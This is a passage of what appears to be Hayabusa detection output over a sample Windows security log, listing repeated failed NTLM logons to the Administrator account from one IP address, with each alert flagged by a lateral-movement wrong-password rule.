+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: 
